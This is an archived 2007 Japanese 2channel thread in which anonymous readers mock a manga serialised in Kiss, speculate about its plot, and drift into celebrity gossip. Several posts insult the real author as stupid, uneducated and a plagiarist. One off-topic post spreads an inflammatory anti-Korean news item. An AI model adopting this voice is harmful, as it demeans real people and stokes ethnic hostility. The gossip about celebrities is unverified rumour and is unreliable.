273 :花と名無しさん:2007/01/13(土) 20:53:01 ID:???0
くたびれてても、下品でも,頭が悪くても
仕事を持ってる女はこやまにしてみれば、皆、いけてるいい女。
逆に専業主婦には冷たい扱いをする。
奈津子がこれからどんな風に転落していくのかw。

274 :花と名無しさん:2007/01/13(土) 21:06:19 ID:???0
私服で会社に行く女はクリエイティブな人みたい

275 :花と名無しさん:2007/01/14(日) 09:26:22 ID:???0
グリーンティーは「幸せ運ぶ香水」って呼ばれてるらしい・・・。
それに こやまはひっかけてるんじゃ?
奈津子は振動に「幸せにしてね」て ばっかゆってるが
「幸せ」は人頼みじゃなく自分で掴むものって・・・?

276 :花と名無しさん:2007/01/14(日) 09:32:32 ID:???0
>>274
私は営業はクリエイティブというよりアグレッシブというイメージなんだけどな

277 :花と名無しさん:2007/01/14(日) 11:35:00 ID:???0
>>276
確かに

278 :花と名無しさん:2007/01/14(日) 13:34:27 ID:???O
>>274
私服で会社行くの、ふつーじゃない?

279 :花と名無しさん:2007/01/14(日) 13:50:23 ID:???0
私服で仕事って意味だったのかも

280 :花と名無しさん:2007/01/14(日) 13:58:10 ID:???0
>>278
あ、そらそうだ
ごめん、ひかる本人が何て言ってたかもう忘れたが
私服で仕事、ですね

281 :花と名無しさん:2007/01/14(日) 19:03:33 ID:???0
今時、田舎の地銀の派遣だって私服で仕事してるけどな。

282 :花と名無しさん:2007/01/14(日) 19:24:35 ID:???0
クリエイティブな地銀みたい〜

283 :花と名無しさん:2007/01/14(日) 21:10:46 ID:???0
こやまのOLライフはバブル時代で止まってるから
現代の風刺と合わなくても許してあげてください

284 :花と名無しさん:2007/01/14(日) 21:33:31 ID:???0
振動のマンションの家賃はいくらなんだー

285 :花と名無しさん:2007/01/14(日) 21:51:26 ID:???0
こやまの原稿料はいくらなんだ?

ドブに金を捨てるつもりで払うんだろうなこーだんしゃ。
こんな盗作漫画家を終生雇用するとはご愁傷様。


286 :花と名無しさん:2007/01/14(日) 22:31:11 ID:???0
>>285
現物支給かもよ
今流行のブランド物とかw

287 :花と名無しさん:2007/01/14(日) 23:28:13 ID:???0
「緑茶」1年分とかw

瓶ごと、頭からぶっかけて振動みたいにダンナを発情させてるこやま。

288 :花と名無しさん:2007/01/14(日) 23:33:39 ID:Ncr9oAsGO
初回の扉を無視して 振動&ひかる に一票。奈津子大した報復はなしに身を引く。天野は 静かなほほ笑み。完

289 :花と名無しさん:2007/01/15(月) 00:06:21 ID:???0
大使激怒 日本大使の前で、ヒロシマ原爆をネタに下品に笑う韓国人
韓国が外国貴賓を招いた会での事。
インターコンチネンタルホテル社長がビールの泡を見ながら

『泡が原爆の煙のようだ。広島原子爆弾酒だ』と発言。

それを受けて盛り上がる韓国人達。
一人、険しい顔で屈辱に耐える駐韓大島日本大使。

ttp://app.blog.livedoor.jp/dqnplus/comment.cgi/60890

290 :花と名無しさん:2007/01/15(月) 00:17:33 ID:mkUrpGBAO
>288 奈津子がいきなり去り新堂とひかるがうまくいく。
そしてなぜか唐突に、無意味な天野の静かな微笑みのイラストが投入でfin。
その横に今まで本当に応援ありがとう!!の煽り文句が入ったらまじでポカーンだわwww
最初の表紙での天野の扱いはいったい何だったのだろうと…ww。



291 :花と名無しさん:2007/01/15(月) 00:40:10 ID:???0
>>288
>>290
こやまなら、そんなエンドも充分、あり得るとおもふ。
もともと、何を描きたいのかさっぱりわからな〜い??こやまんが。
いつもポカ〜ンの連続だしネ。



292 :花と名無しさん:2007/01/16(火) 12:10:21 ID:???0
>276見て思い出したけど、ひかるって商品開発を希望しての異動だったよね?
いつの間に営業になった?
あと、今回には感動したよw
だって前スレでここで予想された通りの懐妊発表だったんだもん
ナツコの手料理でホームパーチーの場で発表だなんて
ここの予想ど真ん中のバカイチ展開で鳥肌が立ったよw

293 :花と名無しさん:2007/01/16(火) 19:29:46 ID:???0
>>292
ひかるが医学・薬学部を出ていたならともかく、そうでもなさそうなのに
開発はできないよ。
せいぜいモニターか口出し程度だと思う。

294 :花と名無しさん:2007/01/16(火) 19:44:53 ID:???0
確か容器の提案をしていたような…

295 :花と名無しさん:2007/01/16(火) 19:55:37 ID:???0
ひょうたん型だっけw

296 :花と名無しさん:2007/01/16(火) 20:13:52 ID:???0
ひょうたん型の小瓶ですわw

297 :花と名無しさん:2007/01/16(火) 20:38:10 ID:???0
5色セットね

298 :花と名無しさん:2007/01/16(火) 20:38:50 ID:???0
3流のレベルの低い(大阪では)高卒のこやまに
そんな高学歴のキャラなんて、描けない。
現に、今までもいかにもバカ丸出しのOLしかでてないし。
こやまんがには知性のかけらもないのないないづくし。

299 :花と名無しさん:2007/01/16(火) 22:10:16 ID:???0
ひかるは薬学部でしょ
商品の企画に関わるためか採用試験の為かで、久々に教科書出して勉強
していなかった?
気のせいか?

300 :花と名無しさん:2007/01/16(火) 23:18:40 ID:???0
>>299
???どこにそんなことが書いてあった?
悪い冗談やめてくれ。

301 :花と名無しさん:2007/01/16(火) 23:50:12 ID:???0
>>300

作者と同じ高卒腰掛けOLだよ。
薬学部卒なら、即、研究室とかに入って
あんな受付嬢みたいな仕事してない。ってか、
バカ面営業男を巡って、奈津子みたいな女、相手にもしないだろう。

302 :花と名無しさん:2007/01/17(水) 00:05:24 ID:???0
>>299
落ち着くんだ。
それはこやまんがの破綻っぷりに耐えられなくなった貴方の脳が作り出した
脳内補足設定であって、>>298の言う通りこやまにそんな高学歴(ry

303 :花と名無しさん:2007/01/17(水) 00:17:10 ID:???0
スレ違いかもしれないけど。。
28才のヒカルが高卒就職だとしたら10年前に入社ってことだよね?
そのころって就職氷河期真っ最中で大卒でもなかなか就職決まらなかった。
なのに高卒のヒカルがタケウチ本社(しかも花形の受付)に勤務できるとは凄いよねw
ものすご〜いコネでもあるのか、こやまがバブル世代ドリームで書いたのか・・

304 :花と名無しさん:2007/01/17(水) 00:27:47 ID:???0
>>303
> こやまがバブル世代ドリームで書いたのか・・

それを言うなら、振動の部屋もだよ。
今話題のバラバラ死体にされた夫も、年収数千万〜1億五千万とも
言われているのに、住んでいた青山の月20万の部屋の狭い事。
ワイドショーで再現されていたけどびっくりした。

漫画のあの部屋の家賃は50万くらいか?


305 :花と名無しさん:2007/01/17(水) 00:30:22 ID:???0
うーん、漫画と現実では世代が違うのではないだろうか
季節や世代が違うことはよくあるし

306 :花と名無しさん:2007/01/17(水) 00:50:53 ID:???O
振動は関西在住だよね?青山の事件のマンションは場所代が
家賃の大半だよ、かなりいい場所だから狭くても高い
ちょっと希になったのでスレ違いスマソ

307 :花と名無しさん:2007/01/17(水) 01:05:06 ID:???0
こんなんでいつも「リ・ア・ル」なんてよく煽るよな。
自演乙〜。こやまんが担当者。




308 :花と名無しさん:2007/01/17(水) 01:21:27 ID:???0
>>303
現在(2007年)から逆算してはいけないよ。
こやまの「現在」は、我々とは20年位ギャップがある。


309 :花と名無しさん:2007/01/17(水) 02:10:49 ID:???0
こやまはついにガラかめワールド(別名:磯野ワールド)に突入しました。


310 :花と名無しさん:2007/01/17(水) 02:43:28 ID:???0
>>309
ガラかめだって最新刊では携帯と写メもでてきたんだぞw

311 :花と名無しさん:2007/01/17(水) 08:20:55 ID:???0
王家も「違うのよ、21世紀ではね…」になってるらしいし

312 :花と名無しさん:2007/01/17(水) 08:53:06 ID:???0
ナツコって育ちが悪いんだね
震動の親は何故ヒカルとの結婚には難色を示したのに
ナツコはオケーだったんだ?美人だから?

313 :花と名無しさん:2007/01/17(水) 09:35:05 ID:???0
振動の親ってひかるとの結婚反対してたんだっけ?
もう忘却の彼方だ

314 :花と名無しさん:2007/01/17(水) 10:19:31 ID:???0
コレ読んで真っ先に、こやまんが思い出したw

もう昔とは違う…タバコを吸っても女性にモテない現実
http://news21.2ch.net/test/read.cgi/dqnplus/1159844753/l50

>流行・風俗に詳しいルポライターのIさん(32)は男性の
>喫煙者が減ったことに関してこう語ってくれた。
>「乱暴な言い方をしてしまえば、喫煙行為が女性にモテなく
>なったからじゃないでしょうか。
>昔はドラマや映画の主人公がかっこよくタバコを吸っていた
>シーンが流れていて、喫煙行為にはどこかダンディな
>イメージがありました。
>今のドラマにはタバコをかっこよく吸う主人公なんて
>いないですよ」(Iさん)

Iさんに、ドラマにはないけどこやまんがにはあるよ、と
教えてあげたいw

315 :花と名無しさん:2007/01/17(水) 12:56:50 ID:???0
いやドラマにもあったよ。かっこよくはなかったが
ついこの間までやってた「たったひとつの恋」の亀なし。

316 :花と名無しさん:2007/01/17(水) 14:15:09 ID:???0
>>312
この女2人共どっちも育ちが悪そう。なんせこやまの脳内から生まれたキャラw。
振動と婚約したてのひかるが2人で振動の家に挨拶に行った時、
なぜか先に奈津子が振動の家に上がりこんでいて、(こんなの絶対有り得ない
設定・どこまでもあつかましい奈津子)振動親が、先に上がりこんでいた
奈津子を、息子の恋人だと勘違いしてただけの事。別にひかるが気にいらない
とかの設定はなかった。



317 :花と名無しさん:2007/01/17(水) 14:20:49 ID:???0
こやまゆかりって、ご都合主義のためなら
非常識・アンモラルな(時には犯罪行為に及ぶ)事を
平気で描いてる漫画家。

318 :花と名無しさん:2007/01/17(水) 18:50:55 ID:???0
振動の「NO]と言えない性格もどうかと思う。
仕事やり手なら奈津子や奈津子の親とか
どうにかできたんじゃないかと。

319 :花と名無しさん:2007/01/17(水) 20:58:50 ID:???0
震動は約立たずだよね

320 :花と名無しさん:2007/01/17(水) 21:28:14 ID:???0
でもあの時は、それこそありえないんだけど会社一丸となってw
振動と奈津子をまとめようとしてたからなあ

321 :花と名無しさん:2007/01/17(水) 21:41:30 ID:???0
>震動は約立たずだよね

グリーンティの香りでたちますよ

322 :花と名無しさん:2007/01/17(水) 21:51:02 ID:???0

タケウチ製薬自体DQNだからなあ。振動をはじめとして
そこに飼われいる社員はみんな頭のおかしい連中ばかりだ。

まあ作者の頭がおかしいから当たり前のことなんだけど。

323 :花と名無しさん:2007/01/17(水) 22:13:16 ID:???0
時事ネタですが、この漫画に谷原○介を嵌めた いしだ○成元奥が出てきてもおかしくない気がしてきた。

324 :花と名無しさん:2007/01/17(水) 22:44:36 ID:???0
なんかあっちこっちで見るけど、
なんでハラショーの結婚相手そんなに嫌われてんの?

325 :花と名無しさん:2007/01/17(水) 22:50:31 ID:???0
ハメ婚・妊娠を自らマスコミへリーク
ちなみに妊娠着床時期に
ハラショー以外に壱成とも旅行疑惑

326 :花と名無しさん:2007/01/17(水) 23:16:11 ID:???0
事実は小説より奇なり。

ある意味リアル奈津子。

327 :花と名無しさん:2007/01/17(水) 23:46:05 ID:???0
今日本屋で立ち読みしたけど
煽りにあった奈津子みたいな女になりたいとかいう
そんな記事なんて、グラマラスになかったぞ。
安野モヨ子さんのことなら特集してたけど。違う雑誌かな?

こやまんがの表紙の煽りって嘘・嘘・嘘ばっかり・・・。
まあ「Kissで人気No.1!」なんてこと平気で載せてるし。

328 :花と名無しさん:2007/01/17(水) 23:50:25 ID:???0
ハラショー、離婚も時間の問題のような希ガス。


329 :花と名無しさん:2007/01/17(水) 23:57:30 ID:???0
芸スレでもこの女、いっせいの子、しょうすけの子、
これから種違いの子供何人産むのかね?と叩かれまくりだね。スレチスマン!

330 :花と名無しさん:2007/01/18(木) 00:02:09 ID:???0
このイッセイ元妻の行動をこやまがパクりそうだな

331 :花と名無しさん:2007/01/18(木) 00:48:00 ID:???0
>>314
振動をはじめ、こやまんの男キャラ全員
ニコチンで脳を侵されてるとしか思えん。
「カッコよく」にはほど遠〜いアホ面でくわえ煙草w。

332 :花と名無しさん:2007/01/18(木) 03:31:57 ID:???0
>>327
グラマラスに載ってたのは2〜3月前位のヤツだよ。
奈津子みたいな女になりたい!!ってよりも
奈津子みたいにどんな手段を使っても彼を落とすそんなイケナイ女!
でも好きな彼の為なら…みたいなカンジだった。
ちなみにひかるの事は一切、書かれてなかった。

そもそも振動の為に足を怪我したからってケコーンになるのがおかしな話だよな。

333 :花と名無しさん:2007/01/18(木) 12:25:05 ID:???0
>329
そんな事は素人が案じてあれこれ言う必要など無し!
黙って高岡早紀名人に任せておけばよいのじゃ!

334 :花と名無しさん:2007/01/18(木) 13:21:12 ID:???0
ただ単に話を引っ張りたいが為に、無理やりに振動と奈津子ケコンさせた
よーなもんだよ。あそこで奈津子とケコンさせなければ、もうとっくに
振動&ひかるで林檎は終わってる。(ほんと不自然すぎる展開)
いまだに振動とひかるがgdgdやってるしね。こんな中身のない話、いい加減
終わればいいのに。

335 :花と名無しさん:2007/01/18(木) 20:13:34 ID:???0
>>333
スレ違いだけどなんでそこから高岡早紀なの?
他の板でも同じ事言われてたから気になる。

336 :花と名無しさん:2007/01/18(木) 20:32:15 ID:???0
そもそもひかるが振動とうまく行きそうだったのがダメになって
天野がリンゴの片割れだったって話になる予定なんだよね?
でも今のとこ天野影薄すぎ。こやま振動萌えなんじゃないの。

337 :花と名無しさん:2007/01/18(木) 20:52:04 ID:???0
>>336
確かにそう思える節があるね。
いくらなんでもここまで話進んでも天野の影薄いのは、
こやまが変に振動にこだわり過ぎてるからだと思うし、
自キャラ燃えして、途中から当て馬から本命に昇格したとしか思えん。

338 :花と名無しさん:2007/01/18(木) 21:41:53 ID:???0
○萌え
×燃え

339 :花と名無しさん:2007/01/18(木) 22:27:41 ID:???0
>>335

・布袋と火遊びキスをフライデーに撮られる。(妻は今井美樹)
・獅童インコと深夜の打ち合わせと称してファミレスにて撮られる(妻は竹内結子)

 高岡早紀は芸能人不倫に関しては第一人者。

そんな彼女なのでイッセイ元妻から谷原を奪い返してほしいとの2ちゃん住人たちの願望から
「高岡名人がんばれ!」という感じになった

340 :花と名無しさん:2007/01/18(木) 22:52:19 ID:???0
>>339
えもんのすけさまと、うえさまの組み合わせですな

大奥好きだったから、ちょっと期待しちゃうわ

341 :花と名無しさん:2007/01/19(金) 09:17:29 ID:???0
女だけど、高岡早紀の顔は好み
笑ってる顔より、大奥の時みたいな表情が似合ってると思う。
けだるげな感じっていうか。見下してる感じ?

でもハラショー好きだから変な女に引っかかって欲しくないなぁ
高岡名人もイッセイ元妻も嫌だわぁ

すれ違いスマソ

342 :花と名無しさん:2007/01/19(金) 11:20:18 ID:???0
高岡名人は微妙な夫婦に斬り込んで、
後ろを振り向かずに去って行く官能侍だよ
奈津子もそんなキャラであって欲しかった

343 :花と名無しさん:2007/01/19(金) 15:05:58 ID:???0
奈津子も振動と別れたあとにでも天性の才能を生かして
別れさせ屋でも開業すればいいのにね。



344 :花と名無しさん:2007/01/19(金) 15:49:06 ID:???0
か…官能侍…w

345 :花と名無しさん:2007/01/19(金) 18:14:27 ID:???0
>>342
表現がうまくて感心しました。高岡名人のすべてがわかった気がします。

346 :官能侍:2007/01/19(金) 18:51:07 ID:???0
またつまらぬカップルを破局させてしまった・・・

347 :花と名無しさん:2007/01/19(金) 19:51:46 ID:???0
>>346
コーヒー吹いた!!

348 :花と名無しさん:2007/01/20(土) 00:29:54 ID:???0
>>346
ローズヒップティ吹いた!GJ

349 :花と名無しさん:2007/01/20(土) 15:27:18 ID:???O
ただの当て馬に、今まで振動レベルの男はいなかったよな。いくらなんでもこのまま一生奈津子の相手させるのは 人間の一生をバカにしすぎてる。タバコ入りスパを食べた辺りで 本命は振動になる流れになった。天野ともくっつかない流れだったらまだ分かる。

350 :花と名無しさん:2007/01/20(土) 16:02:51 ID:???0
振動が団子鼻ならとっくにお払い箱だろうな。
でも、過去にツートン亭主(こいつも当て馬丸出しキャラだったんだが)と
より戻しエンドみたいなのもあるからこやまんがはわかんね。

351 :花と名無しさん:2007/01/20(土) 16:03:56 ID:???0
忘れさせないにしてもあまり理由がなさすぎる


352 :花と名無しさん:2007/01/20(土) 16:41:17 ID:VxH3N5hmO
タイトル スイート10で不倫成就したら、、、

353 :花と名無しさん:2007/01/20(土) 16:42:12 ID:VxH3N5hmO
当て馬にしろこのレベルの主要キャラで団子はありえない。

354 :花と名無しさん:2007/01/21(日) 14:45:18 ID:???0
>>312
こやまゆかりって頭も育ちも悪そう。
作品自体にそんな臭いをプンプン漂わせているね。

355 :花と名無しさん:2007/01/21(日) 17:02:50 ID:???O
もうしばらくしたら天野っちの存在自体がなくなってるに10000団子

356 :花と名無しさん:2007/01/21(日) 18:42:34 ID:???0
結局、天野は下品女の都合のいい男でエ・ン・ド!に10000団子

357 :花と名無しさん:2007/01/21(日) 21:02:28 ID:???0
つか、こやまちぇんちぇい自身が作品の方向を
見失ってしまっているのでは?と思ってしまう展開のような。。。

ホント、天野の存在をどうする気なんだろう?
中途半端で終わらせるんだろうか?

最初の複線を全て生かすのであれば、連載が終わるのは
まだまだ先だよね。。。

358 :花と名無しさん:2007/01/21(日) 21:42:36 ID:???0
こやまなんて、本当に人気あるのか?
コミクスも最新刊出ているが、(のだめは別格として)
売り上げもピータン、キャバママ、海苔眉のほうが上だし
どこが「Kiss人気No.1」?


359 :花と名無しさん:2007/01/22(月) 00:41:40 ID:???0
>>358
私は本誌で読むタイプだけどコミックスで一気に読んだら爆笑の
渦に巻き込まれるかも。
満喫で読む人、大丈夫かな。
本誌で読んでここ見て一緒に笑えるっていうのも捨てがたいかな。


360 :花と名無しさん:2007/01/22(月) 01:08:01 ID:???O
>>357
そこで私たちは招待されちゃうのですよ
こやまパラレルワールドに

361 :花と名無しさん:2007/01/22(月) 01:13:21 ID:308QBF3dO
書き続ける漫画として、ほの字とかの方向の方が良かったのかもね、、、

362 :花と名無しさん:2007/01/22(月) 01:54:12 ID:???0
結局震動とかあ...
つまんないの
こやまの漫画って売れてるのか?って気がするよね
まあ、私は読みやすいから好きなんだけど
古本屋でもあんま置いてないし、
時々、古い作品とか、スイテンが2かんだけあったり
バツイチが一冊だけあるところもあったり
中途半端なんだよね

363 :花と名無しさん:2007/01/22(月) 14:27:12 ID:???0
もともと、コミクス売れてねーから、古本屋にもあるはずはなく。
巻数もバラバラなのは、あの大げさな釣りの煽り(kissで大人気!、
こんなリアルな漫画はない!とか)をうけてつい、買ってしまったんだろうね。
うちの近くのブクオフにも林檎の1巻と4巻とふぞろいの林檎たちが、寂しそうに
ありますた。

364 :花と名無しさん:2007/01/22(月) 23:17:30 ID:???0

ちょっと!www↓
***************************

おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)

ヘアアクセサリーその43 [通販・買い物]
【保育園に】待機児童問題【入れてくれ】Part4 [育児]
DA PUMPスレ Part32 [邦楽グループ]
   探偵の経営者・調査員のスレッド    [防犯・詐欺対策]

***************************
一貫性なさすぎwww


365 :花と名無しさん:2007/01/23(火) 00:18:56 ID:???0
嬉々としておすすめ2ちゃんねる貼る人ってバカみたい。
そんなのIE使ってる初心者しか反映されないのに。

366 :花と名無しさん:2007/01/23(火) 00:28:46 ID:???0
何カリカリしてんの?w

367 :花と名無しさん:2007/01/23(火) 00:56:21 ID:???0
一時流行った成分分析はる人と
おすすめ2ちゃんねるはる人って一緒な気がする。
はってる人は面白いつもりなんだよ。
まぁ、そのうち飽きるからほっとくがヨロシ。

368 :花と名無しさん:2007/01/23(火) 07:39:19 ID:???0
>362
こやまんがなんて余程の暇なお金持ちの人しか買わないだろうから
途中まで読んだら捨てるんじゃない?
それか売りに行くのも恥ずかしいか

369 :花と名無しさん:2007/01/23(火) 08:24:03 ID:???0
お金持ちはそもそも不用品を売るって言う発想がない。
処分・廃棄・寄付

370 :花と名無しさん:2007/01/23(火) 14:28:58 ID:???0
煽りに釣られた大阪のおばはん根性(=こやまと同類)のひとが
途中の巻から読みだして、あまりのくだらなさにだまされた気分になり、
せめて\50にでもなればとブクオフに持って行ってるのが現状じゃない?

371 :花と名無しさん:2007/01/23(火) 14:40:25 ID:???0
私は、正直、林檎はちと、今までのこやまの糞作品とは違うかなと
思って、1,2巻(たぶん2冊同時発売だったよ)買ってみたんだが・・orz。
認識が甘かった。恥!何の迷いもなくダスト・ボックス行き。
相変わらずのゴミみてえなこやまんが。


372 :花と名無しさん:2007/01/23(火) 15:59:32 ID:???0
>>371
コミクス発売が
ちょうど、馬場医師の事件の前ぐらいの時期だったよね。
まだあの辺まではましな感じだったのにな林檎。

373 :花と名無しさん:2007/01/23(火) 21:20:00 ID:???0
なんつーか展開力がないんだよね、話に
キャラクターも一辺倒だし
漫画も小説も作家という分類だろうけど
この人は物を創り上げるということが
基本的にできない人

374 :花と名無しさん:2007/01/23(火) 23:23:30 ID:???0
>>373
腕のひどく悪い職人のようなもん?
良かろうが悪かろうが修行して独立すれば一人前!

375 :花と名無しさん:2007/01/23(火) 23:48:24 ID:+0sJRTHBO
最近 間違い佐賀市ネタは?ない?それとは違うけど、すぃーと10の時 家族3人の食卓シーン使い回ししすぎてて笑ったなぁ。

376 :花と名無しさん:2007/01/23(火) 23:50:52 ID:+0sJRTHBO
子が、必ずフォークかスプーンを振り上げている。

377 :花と名無しさん:2007/01/24(水) 00:17:47 ID:???0
天野とくっつけさせるには振動の話を引っ張り過ぎなんだよね。

378 :花と名無しさん:2007/01/24(水) 01:36:30 ID:???0
この人の漫画って、子供を、表現する為の道具としてしか
描いていないから嫌だ。

DV亭主を表現する為に、怯える子供を描いて、
ダンナを繋ぎ止める為に、妊娠する嫌な女を演出させて、
別れた元彼がやり直したいといえば、ダンナとの間に出来た
子供も喜んで再婚して、
子供に慕われる人という設定の為に、幼児教室を出して、
主人公を窮地に立たせる為に、振り回される医者の子供を出して…

子供にも感情があるのに、辻褄合わせやエピソードの為の
道具としてしか使ってないのが嫌だ。

379 :花と名無しさん:2007/01/24(水) 12:02:50 ID:???0
早売り出てるんでしょ?
奈津子の妊娠は間違いなかったんでしょうか?

380 :花と名無しさん:2007/01/24(水) 16:16:42 ID:???0
早売りまだ〜?
いつも早売りしてる所、まだなかったよ。。。

381 :花と名無しさん:2007/01/24(水) 16:24:38 ID:???O
早売り呼んだ。立ち読みだからバレできなくてごめん。
ここへきていきなりの天野ラブフラグ。奈津子は出てこなかったよ。

382 :花と名無しさん:2007/01/24(水) 16:48:39 ID:???0
   +   +
     ∧_∧  +
    ( 0゚・∀・)   wktk
+.   (0゚∪ ∪ +
    と__)__)   +
 


383 :花と名無しさん:2007/01/24(水) 17:27:27 ID:???0
なんだ。当初の予定通りアマノとくっつくのか?
ただでさえつまんないのにもっとつまらんな。

384 :花と名無しさん:2007/01/24(水) 17:41:30 ID:???0
>>377さんが書かれてるように、振動話を引っ張りすぎるから、ヘンな方向に妄想してしまうんだよね。
無駄に連載を延ばしてるからこんなことになるんでしょう。

385 :花と名無しさん:2007/01/24(水) 18:53:21 ID:???0
天野とくっつくんだったら、振動と別れた後立ち直って、天野に助けられながら
今の仕事で頑張れるようになった辺りで終わらせておけばよかったんじゃないかと
今更ながら思うよ。
やっと今頃天野ラブフラグが立っても、これからまた天野の父親の問題かなんかで
家族に反対されたりしてグダグダするんだろうし。ホント、無駄に長い。

386 :花と名無しさん:2007/01/24(水) 18:57:27 ID:???0
振動を取られる心配がなくなった奈津子が応援したりしてw

387 :花と名無しさん:2007/01/24(水) 19:19:00 ID:???0
はやうりでてたよ
でも買ってないしよんでない

388 :花と名無しさん:2007/01/24(水) 20:09:27 ID:???0
ラブフラグついたってことは終了が近い?って
一瞬喜んだけれどあと3分の1残ってる感じだ。

389 :花と名無しさん:2007/01/24(水) 20:46:25 ID:???0
アマノといい感じになりかけた頃に
ナツコ妊娠虚偽発覚→振動から忘れられないやり直そう発言→揺れるひかる
ってな具合になるんだろう。
家族の反対も説得して結婚エンドならあと10巻分くらい連載するのか?

390 :花と名無しさん:2007/01/24(水) 20:48:13 ID:???0
あの父親を見た後で、天野と友達付き合いまでは出来ても
結婚とかは考えられないよね…普通なら。
同情で恋愛してもロクなことはないと思うが。ひかる親だって泣いて反対するだろうし。
唯一喜ぶのは奈津子か。「あんな人間のクズみたいな人を親に持つ人と…」とか言って。
そして、天野より先に振動に殴られたりしてな。奈津子。

391 :花と名無しさん:2007/01/24(水) 21:12:48 ID:ZByyMZXRO
平地に土砂崩れに続いて、こやまワールドが!
エリア分担地図で、滋賀県(琵琶湖)の西に大阪が!
お前はどこに住んどんねん?

392 :花と名無しさん:2007/01/24(水) 21:20:48 ID:???0
>>390 「あんな人間のクズみたいな人を親に持つ人と…」って奈津子が言うの?
あのドキュン母の存在忘れてない?

393 :花と名無しさん:2007/01/24(水) 21:33:04 ID:???0
>>385
こやま自身も、最初はそのあたりで終わりにするつもりだったのかもしれないと思ったりする。
ただ、自分で作り出した奈津子のひどい女ぶりに対して、それなりの反響があったり、
ハンサムで仕事できる男としての振動のキャラに作者自身が入れ込んでしまったりした結果、
あのまま天野エンドにしてしまうのはもったいないような気がして、ここ最近の流れに
なったんじゃあるまいかなんて思ったんだけど、どうかな。

394 :花と名無しさん:2007/01/24(水) 21:36:22 ID:???0
>>392
こやまが一番最初に忘れていますw

395 :390:2007/01/24(水) 21:50:30 ID:???0
>>392
私は覚えてますよ。だから「天野より先に振動が殴りそう」と思った。
(振動はあの母親の最大の被害者だと思う)
でも奈津子本人やこやまは忘れてるかも。

396 :花と名無しさん:2007/01/24(水) 23:25:00 ID:???0
>>392
私も読んでないけど
381サン>今回、奈津子は出てこなかったよ。
ってことは、奈津子は出てきてないんだから
そんなセリフ言うシーンはなかったと思われ...。

397 :花と名無しさん:2007/01/24(水) 23:41:27 ID:zL4LyMGnO
>391
kwsk

398 :花と名無しさん:2007/01/24(水) 23:42:52 ID:???0
>>391
ハゲド!
琵琶湖の西?に大阪?比叡山があって京都だろーが!!
てめーの住んでる所の位置関係もシラネーなんて
こやまってやっぱり、超ド級のバカなんだな。勉強してなくてを
通り越して常識なしの女。kissの編集担当もditto!!
そりゃ、平地で土砂崩れするし、三河安城が静岡県って描くわな。
こんなんで1児の親か?こんな親、恥ずかし杉w。
こやまの子よ!かーちゃんに社会科の日本地図見せてやれ。

399 :花と名無しさん :2007/01/24(水) 23:55:59 ID:???0
くっつくのは天野でも振動でもどっちでもいいが
奈津子は最後1人にしてくれーw

400 :花と名無しさん:2007/01/25(木) 00:06:40 ID:???0
>>381
なんだ、奈津子今回出てないの?
てっきり、腹に何度も手をやりのマタニティー奥さんで
出ると思ってたのに。
本当に妊娠してるのかどうかまだわかんね。ってここまで引張るかね?

401 :花と名無しさん:2007/01/25(木) 00:19:12 ID:???0
ひかると天野、いい雰囲気になってきたら、
「あんな人間のクズみたいな人を親に持つ者同士仲良くしましょうよ」
と、今度は天野を誘惑する奈津子。
奈津子が人の男を盗るのが趣味(特にひかるの男なら)のキャラ設定なら
そうするだろう。

402 :花と名無しさん:2007/01/25(木) 01:18:33 ID:???0
>>401
でも誘惑しても、奈津子の性格知ってるし
天野はなびかなそうだね
天野から奈津子のある面とか、これからどんどん苦し紛れになって
自分を落とすような行動しか取れない見苦しい奈津子をみて

こいつここまでどうして屈折してるんだと思うような場面を見て
みて不憫に思うとか、

同情が愛情に変わるとかしない限り

92 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)